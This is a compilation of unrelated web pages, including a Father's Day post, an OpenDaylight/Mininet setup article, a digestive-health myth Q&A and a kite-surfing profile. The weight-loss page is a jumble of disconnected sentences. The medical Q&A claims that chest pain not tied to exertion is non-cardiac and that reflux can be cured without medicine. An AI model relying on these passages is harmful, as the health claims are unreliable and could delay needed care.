This is a guest post submitted by Mehwish Younus. All views expressed in this article are those of the contributor.

He held your hand when you were stumbling and about to fall, he was there at your first parent-teacher meeting to encourage you, he helped you learn cycling, he kept taking you on camping and fishing trips, and he supported you in following your dreams when no one else was there. He holds a special place in your heart. You are nothing without him, and he is nothing without you. He is your safe place, he is your hero, and you are his champ and princess. He is not Superman but none other than your father. Father's Day is celebrated on the third Sunday of June every year in most parts of the world. This year it will be celebrated on June 20th. Let us look at history to learn more about the origin of this day.

A Brief History of Father's Day

There are two stories behind celebrating Father's Day. Some say that a woman named Sonora Smart Dodd felt that a day honoring fathers should be marked, as her dad, William Smart, was a widower who raised six children all by himself. According to the other story, a lady named Grace Golden Clayton suggested celebrating this day to the minister of a local church. So, what can you do on this day to honor your favorite man in the world? Here is a list of things you can do to celebrate and show your love to your father.

Watch A Movie

There are a bunch of Hollywood and Bollywood movies you can watch along with your daddy: 'Despicable Me,' 'Daddy's Day Out,' 'Grown Ups,' 'Paa,' 'Piku.' As this is the COVID era, going out to the cinema is out of the question. You can set up a projector display in your house or watch these movies on Netflix. Make some popcorn and French fries and spend the entire day watching movies with your father.

Organize A Brunch

On this Father's Day, cook a special meal for your dad. Make his favorite recipes and set a beautiful table. Let your dad choose the menu.
You can also order a cake to make things extra special.

Prepare An Ancestral Tree

Make a beautiful chart exploring your father's lineage and gift it to him. This will be a truly unique gift.

Give Customized Gifts

You can also give your dad some customized gifts. Prepare a beautiful photo book of your memories with your dad, or give him a custom notebook and card with his picture on it. Several online businesses can do the work for you.

Participate In His Favorite Hobby

Whatever your father likes doing, whether it is reading books, playing Scrabble, or even fixing his car, spend quality time doing it with him. He will surely love you for it. You can come up with activities of your own as well and spend this day loving your hero. Wishing you a very happy Father's Day!

What do you think of the story? Tell us in the comments section below.
Source: https://www.parhlo.com/happy-father%E2%80%99s-day-to-all-dads-in-the-world
Whether you are looking to quit smoking, drop some pounds, become more active, or reduce your alcohol consumption, you have come to the right place. 13. The Four Hour Workweek Podcast: fitness and productivity guru Tim Ferriss publishes interviews several times per week with some of the world's most accomplished people. The plan is designed to help you lose weight at a safe rate of 0.5kg to 1kg (1lb to 2lb) per week by sticking to a daily calorie allowance. When eating out at fast food chains, check the kilojoules listed on the menu and choose the lower-kilojoule option. Get online programs, special rates, and courses offered at our medical facilities to help you live healthier. You will eat fewer calories and avoid the chemical additives, added sugar, and unhealthy fats of packaged and takeout foods that can leave you feeling tired, bloated, and irritable, and exacerbate symptoms of depression, stress, and anxiety. Eating healthy doesn't have to be expensive. According to 2015 research published in the Annals of Internal Medicine, increasing your fiber intake leads to more weight loss than a low-fiber diet, and all it takes is 30 grams per day. Avocado oil, which has 124 calories per tablespoon, is "loaded with healthy monounsaturated fat and several antioxidants," Seti said. Follow our approach to healthy eating to help achieve and keep a healthy heart and have the energy to live life to the full. Reduced-calorie, low-calorie, or light versions of your favorite foods may be helpful, but do not assume this means they are also low in salt and sugar. There are no magical foods or ways to combine foods that melt away excess body fat. The Born Fitness team will help you identify the diets, methods, exercises, and workouts that are best suited to you, so that you can apply them to your life, achieve your goals, and live stronger and longer.
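The "safe rate" of 0.5kg to 1kg per week implies a specific daily calorie deficit. A rough sketch, assuming the common (and only approximate) rule of thumb that a kilogram of body fat stores about 7,700 kcal:

```python
# Rough daily calorie deficit implied by a target weekly loss rate.
# Assumes the widely used approximation that 1 kg of body fat stores
# roughly 7,700 kcal; the true figure varies from person to person.
KCAL_PER_KG = 7700

def daily_deficit(kg_per_week: float) -> float:
    """Average daily calorie deficit needed for a weekly loss target."""
    return kg_per_week * KCAL_PER_KG / 7

# The article's "safe" range of 0.5 to 1 kg per week:
low = daily_deficit(0.5)   # 550 kcal/day
high = daily_deficit(1.0)  # 1100 kcal/day
```

The constant is a population-level approximation, not a personal prescription; it only shows why a fixed daily calorie allowance maps onto a steady weekly rate.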
Make a difference: join one of our events, have fun, and raise vital funds to keep Australian hearts beating. Every plan is split into three phases designed to help you lose weight and keep it off.
Source: https://www.jerseygirl-movie.com/information-and-pictures-2.html
Do timing and time diversification improve the average investor's stock market return? Contrary to the literature's scenario of wealthy investors, average investors invest each month over their working life. Many purchases prevent investors from buying at the peak, but horizons decrease, giving later investments less time to offset losses. This paper accommodates timing using internal rates of return, facilitating the comparison of wealthy and average investors. Investments of one to 480 months in the S&P and the downward-trending Nikkei are compared. In conclusion, the average investor's risk and return ratios improve with horizon and, compared to those of wealthy investors, improve in bullish markets and deteriorate in bearish ones.

Keywords: dollar-weighted return; retirement accounts; risk; cost averaging; DCA; time diversification
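The dollar-weighted (internal) rate of return that the abstract uses to accommodate timing can be illustrated with a generic solver; this is a sketch of the standard IRR definition for a stream of monthly contributions, not the paper's own code:

```python
# Dollar-weighted (internal) monthly rate of return for a stream of
# monthly investments, solved by bisection. Generic sketch only.

def irr_monthly(contributions, final_value, lo=-0.99, hi=10.0, tol=1e-10):
    """Find the monthly rate r at which the contributions, each
    compounded from its month to the end, grow to final_value.
    contributions[t] is the amount invested at the start of month t."""
    n = len(contributions)

    def fv_gap(r):
        # Future value of all contributions at month n, minus the target.
        return sum(c * (1 + r) ** (n - t)
                   for t, c in enumerate(contributions)) - final_value

    # fv_gap is increasing in r when all contributions are positive,
    # so bisection on [lo, hi] brackets the unique root.
    while hi - lo > tol:
        mid = (lo + hi) / 2
        if fv_gap(mid) > 0:
            hi = mid
        else:
            lo = mid
    return (lo + hi) / 2

# Twelve monthly payments of 100 that grow to 1,300 overall:
r = irr_monthly([100] * 12, 1300)
```

Because each contribution is weighted by the time it actually spent in the market, this return reflects the timing of purchases, which is exactly what a simple time-weighted average return ignores.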
Source: https://www.econstor.eu/handle/10419/96449
The OpenDaylight SDN controller

Several well-known companies are collaborating on the foundations of future SDN products under the umbrella of the OpenDaylight open source project.

The OpenDaylight project, founded in April 2013, is a "community-led, open, industry-supported framework for accelerating adoption, fostering new innovation, reducing risk, and creating a more transparent approach to Software-Defined Networking" (SDN). OpenDaylight operates under the auspices of the Linux Foundation and has the support of major players in the networking industry: Brocade, Cisco, Juniper, and Citrix are in the front row, along with Red Hat, IBM, and Microsoft. The project aims to create a foundation on which the members will then build their SDN products. The code is mainly written in Java and Python and is licensed under the Eclipse Public License (EPL) 1.0. The first tangible result of the collaboration is the Hydrogen release from February 2014. Hydrogen is actually a complete SDN software distribution, because OpenDaylight consists of numerous subprojects that develop individual components. Synchronized semi-annual releases are planned to ensure consistency. At the core of OpenDaylight is the SDN controller. Its components share a Java Runtime and communicate with each other via function calls. Below this control layer is the southbound interface (as shown in Figure 1), where everything that is more tangible than the control plane resides. Plugins for the protocols that control the data plane and its network devices dock onto the Service Abstraction Layer (SAL), the lowest abstraction layer of the controller and its plugin manager. This multiprotocol support is an important goal of the project and explains why you will find plugins here for OpenFlow (versions 1.0 and 1.3), the Netconf standard, and the OVSDB management protocol for Open vSwitch -- after all, the network equipment can also be virtualized.
In the opposite direction lies the northbound interface, which forms the connection to more abstract things: network applications and management and orchestration software. It includes the OpenStack component Neutron, which establishes network connections for the guests of cloud computing frameworks. The controller uses a REST API to communicate with this type of software. If you are interested in getting started with OpenDaylight, your best approach is to deploy the software in a simulated network, and the free Mininet software is perfect for this purpose (see the Mininet story in this issue). Conveniently, the project offers Linux virtual appliances with Mininet preinstalled. They can operate with different virtualization technologies; the developers recommend VirtualBox. Recent versions have occasionally shown problems with the OVF files provided, so it is advisable to create an Ubuntu VM manually with 1GB of RAM and assign the downloaded VMDK image to it. While the virtual machine is booting, the administrator can install the OpenDaylight controller. The prerequisite for doing so is Java 7. You can download RPM packages and ZIP files from the website; the basic edition is fine. Linux virtual appliances and Docker containers are also available. In a distribution-neutral installation from the ZIP file, you need to run the startup script from the directory created by unpacking the archive. With OpenDaylight running and a Mininet VM ready for action, you can try out a simple forwarding example from the project wiki. On the virtual machine console, the user mininet logs in with mininet as the password. Then, run the following command to create a simple network with a tree-like arrangement of switches at three levels:

sudo mn --controller=remote,ip=<IPaddress> --topo tree,3

Replace the <IPaddress> wildcard with the externally accessible address of the host on which OpenDaylight is running.
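The size of the tree,3 network requested above can be worked out in advance; a small sketch, assuming Mininet's default fanout of two (a full binary tree of switches, with one host per leaf port):

```python
# Size of Mininet's tree topology (--topo tree,<depth>[,<fanout>]).
# Assumes the default fanout of 2: switches form a full tree, and
# each leaf switch port carries one host.

def tree_topo_size(depth: int, fanout: int = 2) -> tuple:
    """Return (switches, hosts) for `mn --topo tree,depth,fanout`."""
    switches = (fanout ** depth - 1) // (fanout - 1)  # internal tree nodes
    hosts = fanout ** depth                           # leaves
    return switches, hosts

# The article's `--topo tree,3` network:
switches, hosts = tree_topo_size(3)  # 7 switches, 8 hosts
```

The seven switches this predicts are exactly what the controller's topology view displays for a three-level tree.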
The URL for the SDN controller's web interface is http://<IPaddress>:8080; the username and password are both admin. The graphical representation in the browser (Figure 2) shows the seven emulated switches that look a little messed up. You can simply drag and drop to arrange them more clearly. Under the network diagram, you'll find the blue button Add Gateway IP Address, which you can then populate with an IP address and subnet mask, such as 10.0.0.254/8. At the Mininet VM console, you can now ping one virtual host from another, for example, using h1 ping h7. Then, switch back to the web interface and go to the Troubleshoot tab. Under Existing Nodes, you can select a node and then view Flows or Ports for detailed information about its connections. These examples by no means exhaust OpenDaylight's capabilities. The software can be clustered, and it also supports remote access via the Java Management Extensions (JMX). The Service Provider Edition of the software also adds plugins for the BGP, PCEP, and SNMP4SDN protocols. Also available is a Virtualization Edition with a Virtual Tenant Manager (VTN), which ties in with the Neutron network component in OpenStack. If you are not part of the developer community of participating companies, you will probably find it difficult to come to grips with OpenDaylight. The documentation on the wiki is very fragmentary and often out of date. It remains to be seen whether this situation will improve or whether customers will be forced to rely on polished products by the manufacturers involved.
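Everything the web interface shows can also be scripted against the controller's REST API mentioned earlier. A minimal sketch using only Python's standard library, assuming the admin/admin defaults on port 8080; the resource path below is illustrative and varies between OpenDaylight versions:

```python
# Build an authenticated request for the OpenDaylight REST API.
# Credentials and port are the article's defaults (admin/admin, 8080);
# the resource path used below is illustrative and version-dependent.
import base64
from urllib.request import Request

def odl_request(host, path, user="admin", password="admin"):
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = Request(f"http://{host}:8080{path}")
    req.add_header("Authorization", f"Basic {token}")  # HTTP Basic auth
    req.add_header("Accept", "application/json")
    return req

req = odl_request("192.0.2.10", "/controller/nb/v2/topology/default")
# urllib.request.urlopen(req) would then fetch the topology as JSON.
```

This is the same northbound interface that orchestration software such as Neutron talks to, so a few lines of scripting are often enough for experiments.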
- OpenDaylight: http://www.opendaylight.org
- Mininet VMs: http://mininet.org/download/
- OpenDaylight downloads: http://www.opendaylight.org/software/downloads
- Installation and getting started: https://wiki.opendaylight.org/view/OpenDaylight_Controller:Installation
- OpenDaylight Summit: http://events.linuxfoundation.org/events/opendaylight-summit
Source: http://www.linuxpromagazine.com/Issues/2014/162/OpenDaylight/(tagID)/31
Shoppers ages 50-54 lead the charge when it comes to purchasing health and beauty products online (52 percent), and shoppers ages 45-49 are purchasing more food and beverage products online (29 percent) than any other age group, according to The Checkout, an ongoing shopper behavior study conducted by The Integer Group and M/A/R/C Research. All age groups show an increase in shopping online, along with an overall increase in shopping in general, in contrast to The Checkout's results from last year, which showed that the 73 percent of shoppers who were buying more online were not shopping more overall; they were just shopping differently. Last year, The Checkout also showed that Boomers were the largest group of shoppers purchasing consumer packaged goods (CPG) online (health, beauty, food, beverage). Both reports indicate that other age groups still aren't sold on the idea of doing standard grocery shopping online, citing product expiration dates and shipping costs as their barriers to purchasing these goods online. "Grocery shopping online is a concept most shoppers have yet to adopt, which means there are conventions ingrained in their shopping behavior that must be disrupted," said Craig Elston, senior vice president, Integer. "Manufacturers and e-tailers have the most to gain if they can help shoppers get over their purchase barriers."
Source: http://merchandisingmatters.com/2012/02/13/boomers-buying-more-online-products-gen-y/
Fourth graders describe how Michigan has changed and stayed the same over time. They explain reasons why people settled, and still settle, in Michigan, then explain the role of geography in the settlement of Michigan.
Source: https://www.lessonplanet.com/teachers/town-growth-and-immigration
Birding enthusiasts attending the Lake Apopka Birding Festival will hope for sightings of winged creatures such as the groove-billed ani, an odd-looking bird with a curved beak and long tail, and the fulvous whistling duck, noted for its long legs and neck along with a white band across its black tail in flight. Sponsored by the Orange Audubon Society, the event is based out of the McDonald Canal area on the Lake County side of the 20,000-acre Lake Apopka north shore and features field trips there and at other Central Florida sites Friday, Jan. 19, through Sunday, Jan. 21. Experts including noted Ohio birder Greg Miller — the inspiration for the 2011 movie “The Big Year,” with Jack Black playing a character based on him — will give participants a chance to search for more than 360 species documented in the area. Festival chairwoman Deborah Green of Longwood said those who attend are in for a treat. “It really is a special place for birding,” said Green, retired founding director of sustainability at Valencia College. Ornithologist Gian Basili of the U.S. Fish and Wildlife Service, who helped shepherd north shore restoration efforts, will kick off the event with a keynote address Thursday, Jan. 18, in the Camellia Room at Leu Gardens, 1920 N. Forest Ave., Orlando. A meet-and-greet will be at 6:30 with a program at 7 p.m. There is no cost but donations are appreciated. This is the second year for a full-fledged festival after a “pilot” event in 2016, Green said. Plans again called for it to be wrapped around the Lake Apopka Wildlife Festival and Birdapalooza at Magnolia Park in Orange County. However, Birdapalooza was canceled this year because of damage from Hurricane Irma and concerns that the popular Lake Apopka Wildlife Drive may not reopen for months. Despite the uncertainty, as it turned out the scenic drive was reopened just before Christmas. 
The McDonald Canal area, off County Road 448A, was less impacted, Green said, and plans could go forward with the birding festival, which is co-sponsored by Lake County’s Oklawaha Valley Audubon Society. The McDonald Canal, 24600 County Road 448A, is the meeting place for 15 field trips. They include a waterfowl trip from 7:30 to 11:30 a.m. Friday led by Bruce Anderson, co-author of “The Birdlife of Florida,” and Orange Audubon’s Tom Rodriguez. Cost is $30. Sunrise photography trips will take place from 5:30 to 11 a.m. all three days. The cost is also $30. Miller will lead five trips. A Dora Canal boat tour is filled but spots remain for other trips including “Birding by Ear” from 7 to 11 a.m. Saturday. In addition to the McDonald Canal, another Lake County site, the Ferndale Preserve, 9220 County Road 455, Clermont, is the meeting spot for “Sparrows, Buntings and other Wintering Birds” from 7:30 to 11 a.m. Friday. For more information about the festival, go to orangeaudubonfl.org/festival. For a list of events and to sign up, go to bit.ly/2EmObMP. email@example.com or 352-742-5916
Source: https://www.orlandosentinel.com/news/lake/os-lk-lake-apopka-birding-festival-20180108-story.html
Breakfast: Cholle Bathure
Lunch: Kadai paneer with rumali roti and lassi
Brunch: Samosas and pakoras
Snacks: Momos and smoothie
Dinner: Chapati, chawal, and rajma
Next day: Mom, my stomach aches, I don't know why!

The above is a perfect example of how we Indians pounce on food. Yet we are convinced that it is not our eating habits but other factors that make us fall ill. This is one of the many misconceptions we carry about our digestive health. The list of myths is a lengthy one, but we got hold of a few and brought you the answers from one of the finest specialists. We spoke with Dr. Kunal Das, Head of the Department of Gastrointestinal Sciences at Manipal Hospitals Dwarka. Read on as he busts some common myths relating to digestive health.

Common Misconceptions about Gastroenterological Problems

Myth 1 – Spicy foods cause ulcers.
Fact – No, spicy food doesn't cause ulcers. But if you have already developed ulcers, then it is advised that you avoid spicy foods. If you have ulcers, you should eat an adequate diet and avoid spices. Rest assured, if you don't have ulcers you can enjoy your chili paneer tikka.

Myth 2 – Digestive problems like constipation are common as one grows older.
Fact – This misconception is widespread, perhaps because older people do not have enough mobility. They may also not consume enough food, may have geriatric problems, or may not take an adequate amount of fiber. So, the main issues are mobility, food, water, and fiber. If you take a good amount of fiber in your diet, for instance a bowl of salad, lots of fruits and green vegetables, and juices, then constipation can be prevented. Practicing healthy eating habits and doing some physical activity is the key. If you do so, then don't worry, you will not have constipation.

Myth 3 – Milk or tea cannot be digested easily and thus makes a person suffer from gas.
Fact – Not everybody suffers from gas after taking milk.
Only patients who are intolerant to milk, in other words lactose intolerant, tend to have this condition. Milk contains a sugar (a carbohydrate) called lactose. Some people lack the enzyme lactase, which digests lactose; only that group of patients is lactose intolerant. When they take milk, the lactose doesn't get digested and gets converted into curd and acid in the body. As a result, they get a lot of gas. If you are lactose intolerant, do not consume milk.

Myth 4 – Medicines for acid reflux should be taken for life.
Fact – This is a very common problem and an even more common question. My answer is that medicines are helpful, but they are not the only solution for acid reflux. We must have a 360-degree view of its treatment. We also recommend a good diet: avoid milk, tea, coffee, citrus fruits and juices like lemon, orange, and mausami, as well as pickles, tamarind, amla, and too much fat. These products need a lot of acid to digest. If you eat a good diet and release stress from your body through yoga and meditation, this ailment can be treated completely. With good food and a healthy lifestyle, you can treat acid reflux without medicines, too. Kick the acid out of your life and live healthily without medicines.

Myth 5 – People believe that chest pain can only be a symptom of cardiac problems.
Fact – Chest pain can have many causes. A cardiac problem is a very important one, and typical cardiac pain is exertional: it is felt when you walk, climb stairs, or run. Pain felt during exertional activity is mostly of cardiac origin. But this is not the only cause of chest pain. There are many others, such as pneumonitis, esophageal motility disorders, muscular chest pain, or even acidity and gas, which can cause retrosternal chest pain. Non-cardiac chest pain is a very important component; cardiac chest pain constitutes a minority, close to 30%.
The important way to diagnose it is by its association with exertional activity. If the pain results from activity such as walking down the street or running, then it is cardiac. All other chest pains are non-cardiac in origin.

Myth 6 – A common belief among smokers is that smoking cigarettes boosts digestion.
Fact – This is completely incorrect. Smoking does not improve digestion. Some people tend to feel relaxed after smoking a cigarette at a stressful time; the only association is with how they feel. On the contrary, smoking increases acidity and gas and hampers digestion. It is an incorrect claim with no medical basis.

Indian delicacies are as diverse and delicious as they can get, and the many treats are matched by just as many myths. In this post, we have shattered some of the most common misconceptions that circulate in our society. We urge you to trust the expertise of Dr. Kunal Das and follow a doctor's advice on medical queries instead of heeding misbeliefs. For a priority appointment or more information, contact us at +91 8010994994 or book an appointment with Dr. Kunal Das at https://www.credihealth.com/doctor/kunal-das-gastroenterologist/overview.

This write-up was contributed to Credihealth by Dr. Kunal Das.

About The Doctor
Dr. Kunal Das is the HOD & Consultant, Gastroenterology, at Manipal Hospitals, Dwarka. He has 16 years of experience in this field. He completed his MBBS and post-graduation in medicine at Maulana Azad Medical College, New Delhi, and his D.M. (Gastroenterology) at G.B. Pant Hospital. Dr. Das also underwent endoscopic ultrasound training at Kinki University, Japan.
Source: https://www.credihealth.com/blog/creditalk-digestive-myths-by-dr-kunal-das/
Rick Jensen straightened up inside his wetsuit, pushed his broad shoulders back, and looked at the sky. "It's blowing about five. Just," he said. "It'd be better if it was more." A northwesterly wind was pushing clouds southeast, and their shadows raced across the beach on Sylt, Germany's northernmost island. Jensen capped his air pump. Only a few strokes and the colorful canvas in the sand had changed into a kite in the shape of a giant C. At each corner, the 21-year-old tied on the flying lines with which he would steer the kite. Then he attached the "control bar," a sort of handlebar, to a harness which hung low around his waist, skimming his hips. A helper raised the kite, Jensen pulled quickly on his lines, and 10 square meters of canvas wafted silently skywards. Bent over a little against the wind, he dragged his monster kite toward the water. There, where the waves were breaking, Jensen dropped his board onto the sand and climbed into the boots mounted on it. Then he leaned backwards -- his entire 90 kilos, all muscle. The kite began to nose-dive, then stopped, then caught the wind and started to scud powerfully out to sea. Jensen pushed the edge of his board into the surf and raced away, following his kite out to sea.

Spectacular Sport That's More Popular Than Windsurfing

This is kite surfing, a spectacular sport that is a mixture of kite flying and windsurfing. Ten years after it was invented, kite surfing is almost more popular than windsurfing. An estimated 30,000 kite surfers now shred the waves around Germany's coasts and on German lakes, and of those, a mere 20 can call themselves professionals. Jensen is one of them. Over the past six years his kite has barely hit the ground. Sun and salt water have bleached his golden hair even blonder. In surfing circles he's known as one of the best -- he has been German junior champion twice already.
And he plans to prove it again at the end of this month, when the best kite surfers on earth meet at the world championships in St. Peter-Ording off the north coast of Germany. Jensen's kite flew relatively flat over the sea; this way he got the most pulling power. It swept Jensen along as though it were a jet boat and he a water skier. And Jensen maneuvered the wakeboard through the waves as though it were some kind of converted mono-water-ski. Jumps are a specialty of his. He whipped the board out of the water, twisted into a back flip, and did a complete 360-degree turn without stopping, passing the handle from one hand to the other behind his back before hitting the water again in a spray of foam.

High Winds And Acrobatic Skills Required

With kite surfing there are two classic kinds of competition. One involves running a straightforward race on a set course. The other is a race with a thrilling difference, known as "freestyle." The winner is the surfer who can put together the fastest, most acrobatic, and most artistic run. This is why Jensen is currently trying to learn the "Mobe 7." Wakeboarding websites describe this complicated move as a Backmobe (which involves several aerial backward rolls) "followed by a 360 degree frontside handle pass." It is, they say, "one of the most advanced handle pass tricks, where the rider has to pass the bar two times before landing." Such a move will score big points in competition. "Kite surfing isn't that hard to learn," Jensen said. "You start jumping your board a lot faster than if you're learning to windsurf." But obviously there's a world of practice between those first little jumps and what is known as a "kite loop." "You need a lot more wind for that," Jensen explained. "Seven on the Beaufort would be good," he said, referring to the Beaufort wind force scale; seven on this scale is a high wind, between 50 and 60 kilometers per hour.
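The quoted figure for Beaufort 7 can be checked against the scale's standard empirical relation, v = 0.836 · B^(3/2) meters per second; a quick sketch:

```python
# Approximate wind speed for a Beaufort force number, using the
# empirical relation v = 0.836 * B**1.5 (v in m/s), converted to km/h.

def beaufort_to_kmh(b: int) -> float:
    mps = 0.836 * b ** 1.5  # empirical Beaufort relation, m/s
    return mps * 3.6        # m/s to km/h

kmh = beaufort_to_kmh(7)  # roughly 56 km/h
```

For force 7 this lands in the mid-50s km/h, consistent with the "between 50 and 60 kilometers per hour" stated above.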
During such a trick, the kite loops while the rider is spinning out of the water. "You can easily get 15 meters high, then you dive down again -- it's better than a rollercoaster," Jensen enthused. There are only a few people in the world who can do this trick with confidence.

The Professional Who Lives In A Rusty VW Van

And because Jensen is one of those people, his sponsor doesn't only provide him with the latest equipment; they also give him a travel budget. "I actually still live with my parents in Pinneberg," a city near Hamburg, he said. "But last year I was only home for about two weeks." Basically his rusty old VW bus is his main place of residence. "If the wind is blowing then I'll either be on the water or somewhere between St. Peter-Ording and Fehmarn," he said. "And in winter I'll be driving to Cape Town to train." One relationship has already been sacrificed to this way of life. "Among other things," Jensen noted. His sponsor is the company that belongs to American windsurfing legend Robby Naish. Naish won his first world windsurfing title at the age of 13 but then took up kite surfing and went on to win the kiteboarding slalom world title at the age of 35. Naish is Jensen's hero: "Nobody is as radical as he is." Unlike windsurfing, where the fan base has grown older, kite surfing is a young sport. On the German coast the number of windsurfers' sails has decreased, replaced by swarms of kites whipping back and forth across the summer skies. Now Jensen hunted for a wave to take him back to shore; he held the kite with one hand and caught an edge in the chop. The foam flew. This time he had guessed wrong, and he crashed while his kite landed between spectators on the beach.

German Women's Kite Surfing Champion Killed

And therein lies the catch with this wind-borne pastime. "Kite surfing is still pretty dangerous," Jensen admitted.
Seven years ago the sport made headlines when two entangled kites dragged Silke Gorldt, the German women's champion at the time, to her death -- she was pulled onto safety fences on the beach and died of internal injuries on the way to the hospital. Since then, manufacturers have tried to make kite surfing less dangerous with the introduction of kite leashes, safety harnesses, and various quick-release features. Even so, a kite surfer died in South Africa this month when he was thrown against boulders, and in June, two kite surfers in Italy were lifted out of the water by high winds and thrown against a car and a building. One was killed as a result. On the Internet you'll also see some hair-raising videos of kite surfing accidents: wind gusts lift kite surfers so high they seem to disappear over the horizon, until they finally make a hard landing. This is why the professional surfers suggest that manufacturers come up with a universal safety-release mechanism. At the moment, every brand has its own system for allowing riders to separate themselves from their kite in an emergency. "But it should be the same sort of handgrip for everyone, so that you can release yourself by reflex," Jensen argued. "After all, the brakes are always in the same place in a car." Jensen himself has experienced the bloody dangers of kite surfing. You can actually find pictures of the hole he tore in his derriere online. He's laughing about it in the YouTube video, but it looks nasty. It happened last autumn. Jensen was trying to do a "grind" -- a trick from skateboarding that involves sliding one's board across a railing or some other solid obstacle -- over an old metal railing, part of an old swimming platform off the beach at Fehmarn. "What you do is jump your board onto a railing and let it slide along. But suddenly there was a screw there that I hadn't seen beforehand," Jensen explained. A visit to the doctor and 16 stitches later, his rear end was whole again.
Working With Wind Power In More Ways Than One

This autumn, Jensen is going to need that rear end -- to sit on. He will be starting an engineering course at university. And obviously he'll be studying in Kiel, the capital of the northern state of Schleswig-Holstein, which also happens to be the capital of German kite surfing. So, afternoons will be spent on the Baltic Sea beaches, then? Jensen shook his head. "I need to take my studies seriously. I've been going so hard with kite surfing up until now that it's no contest as to which comes first." But no matter what he says, it seems he cannot stay away from wind and water. His dream job: to work for the German company Enercon, where he's just applied to do an internship. And what do they do? Among other things, the company, a world leader in wind energy, builds offshore wind farms. Of course.
This grade indicates the overall difficulty of the climb. It takes into account the climb's length, its seriousness and the ease of approach and descent.

I. Short climb, well-protected, fixed belays, easy descent, quick walk-in. Not particularly demanding.
II. One or two pitches, well-protected, fixed belays, descent on easy terrain, quick walk-in. Not particularly demanding nor dangerous.
III. Multi-pitch climb that requires a couple of hours to climb or to walk in (possibly with skis). Good knowledge of the winter mountain environment essential. No fixed belays. Descent usually via abseil down the route.
IV. Long multi-pitch route in an alpine environment. Good knowledge of the winter mountain environment essential. The walk-in may be prone to ice and/or stone falls, and/or avalanches. Difficult descent; abseils need to be rigged.
V. Long, sustained and demanding multi-pitch route. Danger of rock/ice/avalanches, demanding descent. Few repeats.
VI. Extremely long and isolated climb, difficult to repeat in just one day. Difficult approach and descent, and difficult to turn back once on the route. The hardest ice routes in the Alps and the world are currently accounted for in this grade.
VII. As for VI, but harder still. There are few routes of this grade at present.

This grade refers to the technical difficulties of the pitch and takes into account the angle of the ice fall, whether the climbing is sustained or not, the nature of the fall's formation, and the nature of its protection.

1. Easy-angled ice that has no particularly hard sections.
2. Easily protected pitch on good ice.
3. Some 80º sections but on thick, compact ice, with comfortable, well-protected belays.
4. Sustained and near-vertical pitch, or a short pitch with a short, vertical section. Good ice and satisfactory gear.
5. Sustained and nearly always vertical pitch up discreet ice, or a less sustained pitch that is technically more demanding. Few rests.
6. Very sustained pitch that offers no rests at all. Difficult ice; some overlaps and other formations require good technique. Protection difficult to place and often of dubious nature.
7. Very sustained pitch that offers no rests at all. Extremely fragile and technically difficult ice. Protection run-out or non-existent.

The letter "X" refers to particularly fragile formations, while "R" indicates thin ice.
Published in the immediate aftermath of the Second World War, Mises's magnum opus, Human Action (1949), contained a chapter on "The Economics of War" in which he laments the killing of innocents: How far we are today from the rules of international law developed in the age of limited warfare! Modern war is merciless, it does not spare pregnant women or infants; it is indiscriminate killing and destroying. It does not respect the rights of neutrals. Millions are killed, enslaved, or expelled from the dwelling places in which their ancestors lived for centuries. Nobody can foretell what will happen in the next chapter of this endless struggle. About this Quotation: Mises had the very great misfortune of living through the two world wars of the 20th century and seeing firsthand the impact war had on the destruction of life and property. During the First World War he worked as an economic advisor to various private and government bodies in Austria on banking matters and could thus see the terrible inflations which ruined eastern and central Europe, especially Russia and Germany. During the Second World War he was able to seek refuge in Switzerland before coming to the United States. The problems of war and inflation were a central concern in all his writings.
Did you know that alcohol causes 17 million sick days in the UK every year? Many people use alcohol to relax, reduce stress, and ease pressures, but it’s worth noting that excessive drinking can negatively affect wellbeing, physical health, and work productivity. More importantly, research shows one in five UK adults risk damaging their health by regularly drinking more than the Chief Medical Officers’ low-risk drinking guidelines. With this in mind, it’s more vital than ever for your organisation to be aware of alcohol misuse and to signpost your staff to appropriate support. Because you’re in a strong position to engage your team, now is the time to raise awareness and help your workplace establish healthier routines. You can support your employees and promote awareness by following these eight top tips.

1. Promote responsible drinking

Public awareness of alcohol consumption is changing. However, many people are still unaware that they are drinking over the limit and that it affects their health, especially considering that almost 31 percent of drinkers in the UK drink at increasing or high-risk levels. To combat this lack of awareness, offer tools for employees to check how much they drink. For instance, tests like the Drinkaware Alcohol Self-Assessment will show them if their drinking puts them at low risk of harm or if they need to take action to reduce the amount they drink. Additionally, apps like MyDrinkaware can monitor alcohol consumption over time, measuring units, calories and sleep quality. Ultimately, this helps employees moderate their drinking, leading to a better mood and a healthier lifestyle. Want to find out more? Join our Drinkaware webinar.

2. Lay out the facts about alcohol

Do you struggle to explain the facts about alcohol alone? Introduce e-learning courses to your wellbeing initiative so employees can learn about the effects of alcohol and its related harm.
More specifically, e-learning provides employees with the essential facts about alcohol. As a result, they will be able to make good decisions regarding their consumption of alcohol. The knowledge they gain can also help reduce the risk of them endangering themselves or others. In addition, e-learning can be integrated with existing Learning Management Systems or hosted by charities such as Drinkaware, which track course progress and scores. Better yet, you can incorporate these into your health and wellness programs or health and safety training. 3. Train your managers Although you may have specific policies, your current training might not be sufficient for managers to deal with workplace alcohol misuse efficiently. It is worth investing in management training and awareness to prevent alcohol-related mishaps in the workplace. After being referred for support, 69 percent of employees continue to work at their organisation. Some top tips for planning training for line managers include: - Make clear the crucial role line managers play. Managers are in the best position to spot early warning signs and provide support, but they need the training to feel able to do so effectively. - Train managers on your alcohol policies. A good start is to remind them of your own alcohol policy and procedures, then provide training that covers: how to avoid developing a drink culture (such as monitoring stress levels and workloads), the problems alcohol can cause, best ways to support individuals with different types of alcohol issues and dealing with disclosure from employees. Managers would not be expected to assume an expert role but raising awareness will play a crucial part in building a supportive culture. - Cover health and safety considerations. Plan a course of action with managers should an incident occur so that they can contribute to any risk assessments. - Provide a point of contact. 
